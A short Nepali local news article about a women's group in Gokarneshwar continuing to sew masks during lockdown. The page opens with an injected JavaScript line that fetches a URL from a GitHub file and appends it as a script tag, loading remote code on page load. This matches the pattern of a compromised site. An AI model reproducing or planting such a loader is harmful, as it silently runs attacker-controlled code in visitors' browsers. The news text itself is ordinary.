;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं ।
सयपत्री महिला समूहले लकडाउन बेला पनि माक्स बनाउने कार्य जारी राखेको छ । गोकर्णेश्वर नगरपालिका वडा नं ६ मा अवस्थित महिला समूहले माक्स बनाउने तालिम गर्दै आएको थियो।
महिला उद्यमशीलको लागि गोकर्णेश्वर नगरपालिकाले विभिन्न संघ संस्था महिला समूहलाई धेरै प्रकारको शिपमुलक तालिम दिंदै आइरहने क्रममा उक्त महिला समूहलाई पनि आर्थिक सहयोग गरेको थियो ।
“महिला समूहलाई दिदीबहिनीहरु समय मिलाएर माक्स बनाउँछन् जसले गर्दा स्वरोजगार पनि मिलेको छ, अहिले त माग धेरै आको छ बनाउनै भ्याएको छैन ” अध्यक्ष मनिषा कटुवालले बताउनु भयो ।
फेसबुक प्रतिक्रियाहरु